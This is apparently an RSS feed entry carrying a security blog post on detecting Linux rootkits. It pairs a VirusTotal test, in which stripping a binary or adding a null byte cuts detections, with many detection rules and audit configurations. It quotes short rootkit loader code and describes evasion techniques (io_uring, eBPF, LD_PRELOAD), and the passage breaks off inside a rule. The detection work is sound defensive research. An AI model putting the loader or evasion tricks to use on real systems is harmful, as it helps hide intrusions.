<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Elastic Security Labs - Internals</title>
        <link>https://www.elastic.co/kr/security-labs</link>
        <description>Trusted security news &amp; research from the team at Elastic.</description>
        <lastBuildDate>Wed, 22 Apr 2026 13:50:44 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <image>
            <title>Elastic Security Labs - Internals</title>
            <url>https://www.elastic.co/kr/security-labs/assets/security-labs-thumbnail.png</url>
            <link>https://www.elastic.co/kr/security-labs</link>
        </image>
        <copyright>© 2026. elasticsearch B.V. All Rights Reserved</copyright>
        <item>
            <title><![CDATA[Hooked on Linux: Rootkit Detection Engineering]]></title>
            <link>https://www.elastic.co/kr/security-labs/linux-rootkits-2-caught-in-the-act</link>
            <guid>linux-rootkits-2-caught-in-the-act</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[In this second part of a two-part series, we explore Linux rootkit detection engineering, focusing on the limitations of static detection reliance, and the importance of rootkit behavioral detection.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>In <a href="https://www.elastic.co/kr/security-labs/linux-rootkits-1-hooked-on-linux">part one</a>, we examined how Linux rootkits work: their evolution, taxonomy, and techniques for manipulating user space and kernel space. In this second part, we turn to detection engineering. We begin by showing why static detection is often unreliable against Linux rootkits, even when binaries are only trivially modified, and then move on to behavioral and runtime signals that defenders can use instead. From shared object abuse and LKM loading to eBPF, io_uring, persistence, and defense evasion, this article focuses on practical ways to detect and investigate rootkit activity in real environments.</p>
<h2>Static detection via VirusTotal</h2>
<p>Before focusing on behavioral detection techniques, it is useful to examine how well traditional static detection mechanisms identify Linux rootkits. To do so, we conducted a small experiment using VirusTotal as a proxy for traditional signature-based antivirus detection. A dataset of ten Linux rootkits was assembled from publicly available research papers and open-source repositories. Each sample was either uploaded to VirusTotal or retrieved from existing submissions.</p>
<p>For every rootkit, we recorded the number of antivirus engines that flagged the original binary. We then performed two additional tests:</p>
<ol>
<li>Stripped binaries, created using <code>strip --strip-all</code>, removing symbol tables and other non-essential metadata.</li>
<li>Trivially modified binaries, created by appending a single null byte to the original file: an intentionally unsophisticated change.</li>
</ol>
<p>The goal was not to evade detection through advanced obfuscation, but to assess how fragile static signatures are when faced with even the simplest binary modifications.</p>
<p><em>Table 1: Technical overview of the analyzed rootkit dataset</em></p>
<table>
<thead>
<tr>
<th align="left">Rootkit</th>
<th align="left">Basic detections</th>
<th align="left">Stripped</th>
<th align="left">Null byte added</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Azazel</td>
<td align="left">36/66</td>
<td align="left">19/66</td>
<td align="left">21/66</td>
</tr>
<tr>
<td align="left">Bedevil*</td>
<td align="left">32/66</td>
<td align="left">32/66</td>
<td align="left">21/66</td>
</tr>
<tr>
<td align="left">BrokePKG</td>
<td align="left">7/66</td>
<td align="left">3/66</td>
<td align="left">3/66</td>
</tr>
<tr>
<td align="left">Diamorphine</td>
<td align="left">33/66</td>
<td align="left">8/64</td>
<td align="left">22/66</td>
</tr>
<tr>
<td align="left">Kovid</td>
<td align="left">27/66</td>
<td align="left">1/66</td>
<td align="left">15/66</td>
</tr>
<tr>
<td align="left">Mobkit</td>
<td align="left">29/66</td>
<td align="left">6/66</td>
<td align="left">17/66</td>
</tr>
<tr>
<td align="left">Reptile</td>
<td align="left">32/66</td>
<td align="left">3/66</td>
<td align="left">20/66</td>
</tr>
<tr>
<td align="left">Snapekit</td>
<td align="left">30/66</td>
<td align="left">3/66</td>
<td align="left">19/66</td>
</tr>
<tr>
<td align="left">Symbiote</td>
<td align="left">42/66</td>
<td align="left">8/66</td>
<td align="left">22/66</td>
</tr>
<tr>
<td align="left">TripleCross</td>
<td align="left">31/66</td>
<td align="left">17/66</td>
<td align="left">19/66</td>
</tr>
</tbody>
</table>
<p><em>* Bedevil is stripped by default, and thus, the basic and stripped detections are the same</em></p>
<h3>Observations</h3>
<p>As expected, stripping binaries generally resulted in a sharp drop in detection rates. In several cases, detections fell to near-zero, suggesting that some antivirus engines rely heavily on symbol information or other easily removable metadata. Even more telling is the impact of adding a single null byte: a modification that does not alter program logic, execution flow, or behavior, yet still significantly degrades detection for many samples.</p>
<p>This highlights a fundamental weakness of static, signature-based detection. If a one-byte change can meaningfully affect detection outcomes, attackers do not need sophisticated obfuscation to evade static scanners.</p>
<h3>Obfuscation techniques in rootkits</h3>
<p>Interestingly, most of the rootkits in this dataset employ little to no advanced static obfuscation. Where obfuscation is present, it is typically limited to simple XOR encoding of strings or configuration data, or lightweight packing techniques that slightly alter the binary layout. These methods are inexpensive to implement and sufficient to defeat many static signatures.</p>
<p>The absence of more advanced obfuscation in these samples is notable. Many are open-source proof-of-concept rootkits designed to demonstrate techniques rather than to aggressively evade detection. Yet even with minimal or no obfuscation, static detection proves unreliable.</p>
<h3>Why static detection is not enough</h3>
<p>This experiment reinforces a key point: static detection alone is fundamentally insufficient for reliable rootkit detection. The fragility of static signatures (especially in the face of trivial modifications) means defenders cannot rely on file-based indicators or hash-based detection to uncover stealthy threats.</p>
<p>When binaries can be altered without affecting behavior, the only remaining consistent signal is the rootkit's behavior at runtime. For that reason, the remainder of this blog shifts its focus from static artifacts to dynamic analysis and behavioral detection, examining how rootkits interact with the operating system, manipulate execution flow, and leave observable traces during execution.</p>
<p>That is where detection engineering becomes both more challenging and far more effective.</p>
<h2>Dynamic detection engineering</h2>
<h3>Userland rootkit loading detection techniques</h3>
<p>Userland rootkits often hijack the dynamic linking process, injecting malicious shared objects into target processes without needing kernel-level access. An infection begins with the creation of a shared object file. The detection of newly created shared object files can be detected through a detection rule similar to the one displayed below:</p>
<pre><code class="language-sql">file where event.action == &quot;creation&quot; and
(file.extension like~ &quot;so&quot; or file.name like~ &quot;*.so.*&quot;)
</code></pre>
<p>These files are often written to writable or ephemeral paths such as <code>/tmp/</code>, <code>/dev/shm/</code>, or hidden subdirectories under user home directories. Attackers may either download, compile, or drop them directly from a loader. This knowledge may be applied to the detection rule above to reduce noise.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image7.png" alt="Figure 1: Telemetry example of a shared object rootkit file creation" title="Figure 1: Telemetry example of a shared object rootkit file creation." /></p>
<p>As an example, in the telemetry shown above, we can see the threat actor using <code>scp</code> to download a shared object file into a hidden subdirectory within <code>/tmp</code>, then move it to a library directory, attempting to blend in. We detected this, and similar threats, via:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_shared_object_creation.toml">Shared Object Created by Previously Unknown Process</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/defense_evasion_hidden_shared_object.toml">Creation of Hidden Shared Object File</a></li>
</ul>
<p>Once the shared object file is present on the system, the attacker has several options for activating it. The most commonly abused mechanisms are the <code>LD_PRELOAD</code> environment variable, the <code>/etc/ld.so.preload</code> file, and dynamic linker configuration paths such as <code>/etc/ld.so.conf</code>.</p>
<p>The <code>LD_PRELOAD</code> environment variable allows an attacker to specify a shared object that will be loaded before any other libraries during the execution of a dynamically linked binary. This allows for a complete override of <code>libc</code> functions, such as <code>execve()</code>, <code>open()</code>, or <code>readdir()</code>. This method works on a per-process basis and does not require root access.</p>
<p>To detect this technique, telemetry for the <code>LD_PRELOAD</code> environment variable is required. Once this is available, any detection logic to detect uncommon <code>LD_PRELOAD</code> values can be written. For example:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.env_vars != null
</code></pre>
<p>As shown in Figure 1, this was also the next step for the attackers. The attackers moved <code>libz.so.1</code> from <code>/tmp/.X12-unix/libz.so.1</code> to <code>/usr/local/lib/libz.so.1</code>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image18.png" alt="Figure 2: Telemetry example of a shared object rootkit load via LD_PRELOAD" title="Figure 2: Telemetry example of a shared object rootkit load via LD_PRELOAD." /></p>
<p>To be higher fidelity, we implemented this logic using the <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/create-detection-rule#create-new-terms-rule">new_terms rule type</a>, only flagging on previously unseen shared object entries within the <code>LD_PRELOAD</code> variable via:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/defense_evasion_unusual_preload_env_vars.toml#L18">Unusual Preload Environment Variable Process Execution</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/3e9b8bcdc7c1e70705aa33d3981bae224289a549/rules/linux/defense_evasion_ld_preload_cmdline.toml">Unusual LD_PRELOAD/LD_LIBRARY_PATH Command Line Arguments</a></li>
</ul>
<p>Of course, if more than just <code>LD_PRELOAD</code> and <code>LD_LIBRARY_PATH</code> environment variables are collected, the rule above should be altered to include these two items specifically. To reduce noise, statistical analysis and/or baselining should be conducted.</p>
<p>Another method of activation is to leverage the <code>/etc/ld.so.preload</code> file. If present, this file forces the dynamic linker to inject the listed shared object into every dynamically linked binary on the system, resulting in global injection.</p>
<p>A similar method involves altering the dynamic linker’s configuration to prioritize malicious library paths. This can be achieved by modifying <code>/etc/ld.so.conf</code> or adding entries to <code>/etc/ld.so.conf.d/</code>, followed by executing <code>ldconfig</code> to update the cache. This changes the resolution path of critical libraries, such as <code>libc.so.6</code>.</p>
<p>These scenarios can be detected by monitoring the <code>/etc/ld.so.preload</code> and <code>/etc/ld.so.conf</code> files, as well as the <code>/etc/ld.so.conf.d/</code> directory for creation/modification events. Using this raw telemetry, a detection rule to flag these events can be implemented:</p>
<pre><code class="language-sql">file where event.action in (&quot;creation&quot;, &quot;rename&quot;) and
file.path like (&quot;/etc/ld.so.preload&quot;, &quot;/etc/ld.so.conf&quot;, &quot;/etc/ld.so.conf.d/*&quot;)
</code></pre>
<p>We frequently see this chain, where a shared object is created, and then the dynamic linker is modified.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image9.png" alt="Figure 3: Telemetry example of shared object creation followed by dynamic linker configuration creation" title="Figure 3: Telemetry example of shared object creation followed by dynamic linker configuration creation." /></p>
<p>Which we detect via the following detection rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/defense_evasion_dynamic_linker_file_creation.toml">Dynamic Linker Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml">Modification of Dynamic Linker Preload Shared Object</a></li>
</ul>
<p>Chaining these two alerts together on a single host warrants investigation.</p>
<h3>Kernel-space rootkit loading detection techniques</h3>
<p>Loading an LKM manually typically requires using built-in command-line utilities such as <code>modprobe</code>, <code>insmod</code>, and <code>kmod</code>. Detecting the execution of these utilities will detect the loading phase (when performed manually).</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (process.name == &quot;kmod&quot; and process.args == &quot;insmod&quot; and
   process.args like~ &quot;*.ko*&quot;) or
  (process.name == &quot;kmod&quot; and process.args == &quot;modprobe&quot; and
   not process.args in (&quot;-r&quot;, &quot;--remove&quot;)) or
  (process.name == &quot;insmod&quot; and process.args like~ &quot;*.ko*&quot;) or
  (process.name == &quot;modprobe&quot; and not process.args in (&quot;-r&quot;, &quot;--remove&quot;))
)
</code></pre>
<p>Many open-source rootkits are published without a loader and rely on pre-installed LKM-loading utilities. An example is <a href="https://github.com/MatheuZSecurity/Singularity">Singularity</a>, which provides a <code>load_and_persistence.sh</code> script, which performs several actions, after which it eventually calls <code>insmod &quot;$MODULE_DIR/$MODULE_NAME.ko&quot;</code>. Although <code>insmod</code> is called in the command, <code>insmod</code> is actually <code>kmod</code> under the hood, with <code>insmod</code> as a process argument. An example of a Singularity load:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image15.png" alt="Figure 4: Telemetry example of loading singularity.ko via kmod" title="Figure 4: Telemetry example of loading singularity.ko via kmod." /></p>
<p>Which can be easily detected via the following detection rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/persistence_insmod_kernel_module_load.toml">Kernel Module Load via Built-in Utility</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/5d5e1d9ca43c1344927a0e81302bc14cb1891a20/rules/linux/persistence_kernel_module_load_from_unusual_location.toml">Kernel Module Load from Unusual Location</a></li>
</ul>
<p>This detection approach, however, is far from bulletproof, as many rootkits rely on a loader to load the LKM, thereby bypassing execution of these userland utilities.</p>
<p>For example, <a href="https://codeberg.org/hardenedvault/Reptile-vault-range/src/commit/01dc5e1300bf1ba364870c8f4781e085c3c463e9/kernel/loader/loader.c">Reptile’s loader</a> directly invokes the <code>init_module</code> syscall with an in-memory decrypted kernel blob:</p>
<pre><code class="language-c">#define init_module(module_image, len, param_values) syscall(__NR_init_module, module_image, len, param_values)

int main(void) {
    [...]
    do_decrypt(reptile_blob, len, DECRYPT_KEY);
    module_image = malloc(len);
    memcpy(module_image, reptile_blob, len);
    init_module(module_image, len, &quot;&quot;);
    [...]
}
</code></pre>
<p>Additionally, <a href="https://codeberg.org/hardenedvault/Reptile-vault-range/src/commit/01dc5e1300bf1ba364870c8f4781e085c3c463e9/kernel/kmatryoshka/kmatryoshka.c">Reptile’s kmatryoshka module</a> acts as an in-kernel chainloader that decrypts and loads another hidden LKM using a direct function pointer to <code>sys_init_module</code>, located via <code>kallsyms_on_each_symbol()</code>. This further obscures the loading mechanism from userland visibility.</p>
<p>Because of this, it's essential to understand what these utilities do under the hood; they are merely wrappers around the <code>init_module()</code> and <code>finit_module()</code> system calls. Effective detection should therefore focus on tracing these syscalls directly, rather than the tooling that invokes them.</p>
<p>To ensure the availability of the data sources required to load LKMs, various security tools can be employed. Auditd or Auditd Manager are suitable choices. To facilitate the collection of <code>init_module()</code> and <code>finit_module</code> syscalls, the subsequent configuration can be implemented.</p>
<pre><code class="language-sql">-a always,exit -F arch=b64 -S finit_module -S init_module
-a always,exit -F arch=b32 -S finit_module -S init_module
</code></pre>
<p>Combining this raw telemetry with a detection rule that alerts when this event occurs allows for a strong defense.</p>
<pre><code class="language-sql">driver where event.action == &quot;loaded-kernel-module&quot; and
auditd.data.syscall in (&quot;init_module&quot;, &quot;finit_module&quot;)
</code></pre>
<p>This strategy will allow detection of the kernel module loading, regardless of the utility being used for the loading event. In the example below, we see a true positive detection of the <a href="https://github.com/m0nad/Diamorphine">Diamorphine</a> rootkit.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image2.png" alt="Figure 5: Telemetry example of detecting the Diamorphine load event via finit_module() syscall" title="Figure 5: Telemetry example of detecting the Diamorphine load event via finit_module() syscall." /></p>
<p>This pre-built rule is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_kernel_driver_load.toml">Kernel Driver Load</a></li>
</ul>
<p>Additional Linux detection engineering guidance through Auditd is presented in the <a href="https://www.elastic.co/kr/security-labs/linux-detection-engineering-with-auditd">Linux detection engineering with Auditd research</a>.</p>
<h4>Out-of-tree and unsigned modules</h4>
<p>Another sign of a malicious LKM is the presence of the kernel “taint” flag. When the kernel detects that a module is loaded that is either not part of the official kernel tree, lacks a valid signature, or uses a non-permissive license, it marks the kernel as “tainted”. This is a built-in integrity mechanism that indicates the kernel is in a potentially untrusted state. An example of this is shown below, where the <code>reveng_rtkit</code> module is loaded:</p>
<pre><code class="language-shell">[ 2853.023215] reveng_rtkit: loading out-of-tree module taints kernel.
[ 2853.023219] reveng_rtkit: module license 'unspecified' taints kernel.
[ 2853.023220] Disabling lock debugging due to kernel taint
[ 2853.023297] reveng_rtkit: module verification failed: signature and/or required key missing - tainting kernel
</code></pre>
<p>The kernel identifies the module as out-of-tree, with an unspecified license, and missing cryptographic verification. This results in the kernel being marked tainted.</p>
<p>To detect this behavior, system and kernel logging must be parsed and ingested. Once kernel log telemetry is available, simple pattern matching or rule-based detection can flag these events. Out-of-tree module loading can be detected through:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;loading out-of-tree module taints kernel.&quot;
</code></pre>
<p>And similar detection logic can be implemented to detect unsigned module loading:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;module verification failed: signature and/or required key missing - tainting kernel&quot;
</code></pre>
<p>Using the detection logic above, we observed true positives in telemetry, attempting to load Singularity:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image17.png" alt="Figure 6: Telemetry example of a kernel taint upon the loading of Singularity" title="Figure 6: Telemetry example of a kernel taint upon the loading of Singularity." /></p>
<p>These rules are by default available in:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_tainted_kernel_module_load.toml">Tainted Kernel Module Load</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml">Tainted Out-Of-Tree Kernel Module Load</a></li>
</ul>
<p>The log entry will always show the module name that triggered the event, enabling easy triage. When the LKM is not present in the system during a manual check triggered by this alert, it may indicate that the LKM is hiding itself.</p>
<h4>Kill signals</h4>
<p>Many (open-source) rootkits leverage <code>kill</code> signals, specifically those in the higher, unassigned ranges (32+), as covert communication channels or triggers for malicious actions. For instance, a rootkit might intercept a specific high-numbered <code>kill</code> signal (e.g., <code>kill -64 &lt;pid&gt;</code>). Upon receiving this signal, the rootkit's payload could be configured to elevate privileges, execute commands, toggle hiding capabilities, or establish a backdoor.</p>
<p>To detect this, we can leverage Auditd and create a rule that collects all kill signals:</p>
<pre><code class="language-sql">-a exit,always -F arch=b64 -S kill -k kill_rule
</code></pre>
<p>The arguments passed to <code>kill()</code> are <code>kill(pid, sig)</code>. We can query <code>a1</code> (the signal) to flag any kill signal above 32.</p>
<pre><code class="language-sql">process where event.action == &quot;killed-pid&quot; and
auditd.data.syscall == &quot;kill&quot; and auditd.data.a1 in (
&quot;21&quot;, &quot;22&quot;, &quot;23&quot;, &quot;24&quot;, &quot;25&quot;, &quot;26&quot;, &quot;27&quot;, &quot;28&quot;, &quot;29&quot;, &quot;2a&quot;,
&quot;2b&quot;, &quot;2c&quot;, &quot;2d&quot;, &quot;2e&quot;, &quot;2f&quot;, &quot;30&quot;, &quot;31&quot;, &quot;32&quot;, &quot;33&quot;, &quot;34&quot;,
&quot;35&quot;, &quot;36&quot;, &quot;37&quot;, &quot;38&quot;, &quot;39&quot;, &quot;3a&quot;, &quot;3b&quot;, &quot;3c&quot;, &quot;3d&quot;, &quot;3e&quot;,
&quot;3f&quot;, &quot;40&quot;, &quot;41&quot;, &quot;42&quot;, &quot;43&quot;, &quot;44&quot;, &quot;45&quot;, &quot;46&quot;, &quot;47&quot;
)
</code></pre>
<p>Analyzing the <code>kill()</code> syscall for unusual signal values via Auditd presents a strong detection opportunity against rootkits that utilize these signals, as seen in techniques such as those employed by Diamorphine. The kill-related pre-built rules are available at:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/defense_evasion_unsual_kill_signal.toml">Unusual Kill Signal</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/defense_evasion_kill_command_executed.toml">Kill Command Execution</a></li>
</ul>
<h4>Segfaults</h4>
<p>Finally, it’s essential to recognize that kernel-space rootkits are inherently fragile. LKMs are typically compiled for a specific kernel version and configuration. An incorrectly resolved symbol or a misaligned memory write may trigger a segmentation fault. While these failures may not immediately expose the rootkit’s functionality, they provide strong forensic signals.</p>
<p>To detect this, raw syslog collection must be enabled. From there, writing a detection rule to flag segfault messages can help identify either malicious behavior or kernel instability, both of which warrant investigation:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and message:&quot;segfault&quot;
</code></pre>
<p>This detection rule is available out-of-the-box as <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/about-building-block-rules">a building block rule</a>:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules_building_block/execution_linux_segfault.toml">Segfault Detected</a></li>
</ul>
<p>Combining syscall-level module-loading visibility with kernel taint, out-of-tree messages, kill-signal detection, and segfault alerts lays the foundation for a layered strategy to detect LKM-based rootkits.</p>
<h3>eBPF rootkits</h3>
<p>eBPF rootkits exploit the legitimate functionality of the Linux kernel’s BPF subsystem. Programs can be dynamically loaded and attached using utilities like <code>bpftool</code> or via custom loaders that abuse the <code>bpf()</code> syscalls.</p>
<p>Detecting eBPF-based rootkits requires visibility into both <code>bpf()</code> syscalls and the use of sensitive eBPF helpers. Key indicators involved include:</p>
<ul>
<li><code>bpf(BPF_MAP_CREATE, ...)</code></li>
<li><code>bpf(BPF_MAP_LOOKUP_ELEM, ...)</code></li>
<li><code>bpf(BPF_MAP_UPDATE_ELEM, ...)</code></li>
<li><code>bpf(BPF_PROG_LOAD, ...)</code></li>
<li><code>bpf(BPF_PROG_ATTACH, ...)</code></li>
</ul>
<p>Leveraging Auditd, an audit rule can be created where <code>a0</code> is leveraged to specify the specific BPF syscalls of interest:</p>
<pre><code class="language-shell">-a always,exit -F arch=b64 -S bpf -F a0=0 -k bpf_map_create
-a always,exit -F arch=b64 -S bpf -F a0=1 -k bpf_map_lookup_elem
-a always,exit -F arch=b64 -S bpf -F a0=2 -k bpf_map_update_elem
-a always,exit -F arch=b64 -S bpf -F a0=5 -k bpf_prog_load
-a always,exit -F arch=b64 -S bpf -F a0=8 -k bpf_prog_attach
</code></pre>
<p>These must be tuned on a per-environment basis to ensure that benign programs (e.g., EDRs or other observability tools) that leverage eBPF do not generate noise. Another important signal is the use of eBPF helper functions.</p>
<h4>The bpf_probe_write_user helper function</h4>
<p>The <code>bpf_probe_write_user</code> helper allows kernel-space eBPF programs to write directly to userland memory. Although intended for debugging, this function can be abused by rootkits.</p>
<p>Detection remains challenging, but Linux kernels commonly log the use of sensitive helpers, such as <code>bpf_probe_write_user</code>. Monitoring for these entries offers a detection opportunity, requiring raw syslog collection and specific detection rules, such as the following:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;bpf_probe_write_user&quot;
</code></pre>
<p>This rule will alert on any kernel log entry indicating the use of <code>bpf_probe_write_user</code>. While legitimate tools may occasionally invoke it, unexpected or frequent use, especially alongside suspicious process behavior, warrants investigation. Context, such as the eBPF program’s attachment point and the userland process involved, aids triage. This detection rule is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_bpf_probe_write_user.toml">Suspicious Usage of bpf_probe_write_user Helper</a></li>
</ul>
<p>Below are a few obvious examples of true positives detected by this logic:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image20.png" alt="Figure 7: Telemetry example of bpf_probe_write_user function call via a malicious eBPF program" title="Figure 7: Telemetry example of bpf_probe_write_user function call via a malicious eBPF program." /></p>
<p>The rule triggers on <a href="https://github.com/eeriedusk/nysm">nysm</a> (a stealthy post-exploitation container) and <a href="https://github.com/krisnova/boopkit">boopkit</a> (a Linux eBPF backdoor).</p>
<h3>io_uring rootkits</h3>
<p><a href="https://www.armosec.io/blog/io_uring-rootkit-bypasses-linux-security/">ARMO research</a> (2025) introduced a new defense evasion technique that leverages <code>io_uring</code>, a design for asynchronous I/O, to reduce observable syscall activity and bypass standard telemetry. This technique is limited to kernel versions 5.1 and above and avoids using hooks. Although the method was recently discovered by rootkit researchers, it is still actively being developed and remains relatively immature in its feature set. An example tool that leverages this technique is <a href="https://github.com/MatheuZSecurity/RingReaper">RingReaper</a>. Rootkits can batch file, network, and other I/O operations via <code>io_uring_enter()</code>. A code example is shown below.</p>
<pre><code class="language-c">struct io_uring_sqe *sqe = io_uring_get_sqe(&amp;ring);
io_uring_prep_read(sqe, fd, buf, size, offset);
io_uring_submit(&amp;ring);
</code></pre>
<p>These calls queue and submit a read request using <code>io_uring</code>, bypassing typical syscall telemetry paths.</p>
<p>Unlike syscall table hooking or <code>LD_PRELOAD</code>-based injection, <code>io_uring</code> is not a rootkit delivery mechanism itself but provides a stealthier means of interacting with the filesystem and devices post-compromise. While <code>io_uring</code> cannot directly execute binaries (due to the lack of <code>execve</code>-like capabilities), it enables malicious actions such as file creation, enumeration, and data exfiltration, while minimizing observability.</p>
<p>Detecting <code>io_uring</code>-based rootkits requires visibility into the syscalls that underpin their operation, such as <code>io_uring_setup()</code>, <code>io_uring_enter()</code>, and <code>io_uring_register()</code>.</p>
<p>While EDR solutions may struggle to capture the indirect effects of <code>io_uring</code>, Auditd can trace these syscalls directly. The following audit rule captures relevant events for analysis:</p>
<pre><code class="language-shell">-a always,exit -F arch=b64 -k io_uring
-S io_uring_setup -S io_uring_enter -S io_uring_register
</code></pre>
<p>However, this only exposes the syscall usage itself, not the specific file or object being accessed. The real &quot;magic&quot; of <code>io_uring</code> occurs within userland libraries (e.g., <code>liburing</code>), making analysis of syscall arguments essential.</p>
<p>For example, monitoring <code>io_uring_enter()</code> with <code>to_submit &gt; 0</code> indicates that an I/O operation is being batched, while alternating calls with <code>min_complete &gt; 0</code> signals completion polling. Correlating with process attributes (e.g., UID=0, unusual paths such as <code>/dev/shm</code>, <code>/tmp</code>, or <code>tmpfs</code>-backed locations) enhances detection efficacy.</p>
<p>A practical method for tracing <code>io_uring</code> activity is via eBPF with tools like <code>BCC</code>, targeting tracepoints such as <code>sys_enter_io_uring_enter</code>. This allows analysts to monitor process behavior and active file descriptors during <code>io_uring</code> operations:</p>
<pre><code class="language-c">tracepoint:syscalls:sys_enter_io_uring_enter
{
    printf(&quot;\nPID %d (%s) called io_uring_enter with fd=%d, to_submit=%d, min_complete=%d, flags=%d\n&quot;,
        pid, comm, args-&gt;fd, args-&gt;to_submit, args-&gt;min_complete, args-&gt;flags);

    printf(&quot;Manually inspect with: ls -l /proc/%d/fd\n&quot;, pid);
}
</code></pre>
<p>To illustrate this, several techniques introduced by RingReaper were tested. Live tracing reveals the file descriptors in use, helping identify suspicious activity like reading from <code>/run/utmp</code> to detect what users are logged in:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image16.png" alt="Figure 8: RingReaper users' command" title="Figure 8: RingReaper users' command." /></p>
<p>The activity of writing to a file, in this example <code>/root/test</code>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image1.png" alt="Figure 9: RingReaper put command" title="Figure 9: RingReaper put command." /></p>
<p>Or listing process information via <code>ps</code> by reading the <code>comm</code> contents for each active PID:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image6.png" alt="Figure 10: RingReaper ps command" title="Figure 10: RingReaper ps command." /></p>
<p>While syscall monitoring exposes <code>io_uring</code> usage, it does not directly reveal the nature of the I/O without additional correlation. <code>io_uring</code> is a relatively new technique and therefore still stealthy; however, it also has several limitations. <code>io_uring</code> cannot directly execute code; however, attackers may abuse file writes (e.g., cron jobs, udev rules) to achieve delayed or indirect execution, as demonstrated by persistence techniques used by the Reptile and <a href="https://www.levelblue.com/blogs/spiderlabs-blog/unveiling-sedexp/">Sedexp</a> malware families.</p>
<h3>Rootkit persistence techniques</h3>
<p>Rootkits, whether in userland or kernel space, require some form of persistence to remain functional across reboots or user sessions. The methods vary depending on the type and privileges of the rootkit, but commonly involve abusing configuration files, service management, or system initialization scripts.</p>
<h4>Userland rootkits – environment variable persistence</h4>
<p>When using <code>LD_PRELOAD</code> to activate a userland rootkit, the behavior is not persistent by default. To achieve persistence, attackers may modify shell initialization files (e.g., <code>~/.bashrc</code>, <code>~/.zshrc</code>, or <code>/etc/profile</code>) to export environment variables such as <code>LD_PRELOAD</code> or <code>LD_LIBRARY_PATH</code>. These modifications ensure that every new shell session automatically inherits the environment required to activate the rootkit. Notably, these files exist for both user and root contexts. Therefore, even non-privileged users can introduce persistence that hijacks execution flow at their privilege level.</p>
<p>To detect this, a rule similar to the one displayed below can be used:</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.path like (
  // system-wide configurations
  &quot;/etc/profile&quot;, &quot;/etc/profile.d/*&quot;, &quot;/etc/bash.bashrc&quot;,
  &quot;/etc/bash.bash_logout&quot;, &quot;/etc/zsh/*&quot;, &quot;/etc/csh.cshrc&quot;,
  &quot;/etc/csh.login&quot;, &quot;/etc/fish/config.fish&quot;, &quot;/etc/ksh.kshrc&quot;,

  // root and user configurations
  &quot;/home/*/.profile&quot;, &quot;/home/*/.bashrc&quot;, &quot;/home/*/.bash_login&quot;,
  &quot;/home/*/.bash_logout&quot;, &quot;/home/*/.bash_profile&quot;, &quot;/root/.profile&quot;,
